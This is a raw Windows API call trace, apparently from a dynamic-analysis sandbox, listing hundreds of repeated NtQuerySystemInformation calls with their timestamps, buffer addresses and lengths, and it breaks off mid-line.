[0283.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0283.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0283.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0283.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x20, ResultLength=0x0) [0283.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0283.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0283.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf8, Length=0x58, ResultLength=0x0) [0283.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0283.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb80, Length=0x28, ResultLength=0x0) [0283.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0283.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0283.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0283.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0283.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0283.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0283.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0283.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x20, ResultLength=0x0) [0283.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0283.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0283.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0283.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0283.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0283.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0283.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0283.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0283.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0283.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0283.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0283.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0283.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf8, Length=0x58, ResultLength=0x0) [0283.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x58, ResultLength=0x0) [0283.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0283.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x28, ResultLength=0x0) [0283.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0283.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x28, ResultLength=0x0) [0283.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x28, ResultLength=0x0) [0283.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0283.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca60, Length=0x20, ResultLength=0x0) [0283.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x20, ResultLength=0x0) [0283.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x20, ResultLength=0x0) [0283.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x20, ResultLength=0x0) [0283.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0283.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca60, Length=0x20, ResultLength=0x0) [0283.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x58, ResultLength=0x0) [0283.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0283.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x28, ResultLength=0x0) [0283.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0283.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x28, ResultLength=0x0) [0283.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x28, ResultLength=0x0) [0283.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9a0, Length=0x20, ResultLength=0x0) [0283.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x20, ResultLength=0x0) [0283.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x20, ResultLength=0x0) [0283.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x20, ResultLength=0x0) [0283.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0283.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0283.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca60, Length=0x20, ResultLength=0x0) [0283.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x58, ResultLength=0x0) [0283.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0283.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x28, ResultLength=0x0) [0283.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0283.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x28, ResultLength=0x0) [0283.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.225] NtQuerySystemInformation 